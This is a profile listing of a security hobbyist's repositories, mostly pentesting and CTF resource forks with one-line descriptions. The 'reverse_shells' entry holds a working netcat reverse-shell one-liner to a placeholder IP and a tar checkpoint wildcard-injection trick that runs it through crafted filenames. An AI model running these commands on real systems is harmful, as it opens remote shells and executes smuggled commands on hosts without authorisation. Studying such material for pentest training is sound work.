Abdullah Baghuth's repositories
Buffer-Overflow-Prep
Windows 7 VM with Immunity Debugger and Putty preinstalled.
PayloadsAllTheThings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
ArabicWebAppsPentesting
This repo will contain POC, demo files, and any links given during the Arab web application penetration testing course.
Armstrong-numbers-
Armstrong number is a number that is equal to the sum of cubes of its digits. For example 0, 1, 153, 370, 371 and 407 are the Armstrong numbers.
AutoRecon
AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.
breach-parse
A tool for parsing breached passwords
buffer-overflow-linux-64-bit
buffer overflow linux 64 bit
CaptureTheFlag-walkthroughs
CTF writeups - Tryhackme, HackTheBox, Vulnhub
CheatSheetSeries
The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.
Gf-Patterns
GF Paterns For (ssrf,RCE,Lfi,sqli,ssti,idor,url redirection,debug_logic, interesting Subs) parameters grep
github-markdown-toc
Easy TOC creation for GitHub README.md
GTFOBins.github.io
Curated list of Unix binaries that can be exploited to bypass system security restrictions
hackthebox-writeups
Writeups for HacktheBox 'boot2root' machines
Infoga
Infoga - Email OSINT
Interactive-Terminal-Spawned-via-Python
Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host.
juice-shop
OWASP Juice Shop: Probably the most modern and sophisticated insecure web application
Matrix-Addition
This program will preform Matrix Addition using C ,
pentesting-scripts
Useful scripts for pen testing. Require modification to run
Practical-Ethical-Hacking-Resources
Compilation of Resources from TCM's Practical Ethical Hacking Udemy Course
privilege-escalation-awesome-scripts-suite
PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
Python-assisted-exploitation
https://my.ine.com/CyberSecurity/courses/5810c2ff/penetration-testing-preliminary-skills-programming
reverse_shells
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh touch "/var/www/html/--checkpoint-action=exec=sh shell.sh" touch "/var/www/html/--checkpoint=1"
social-engineer-toolkit
The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.
SQL-injection
Port Swigger SQL injection Lab Solutions
xss-payload-list
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
ysoserial
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.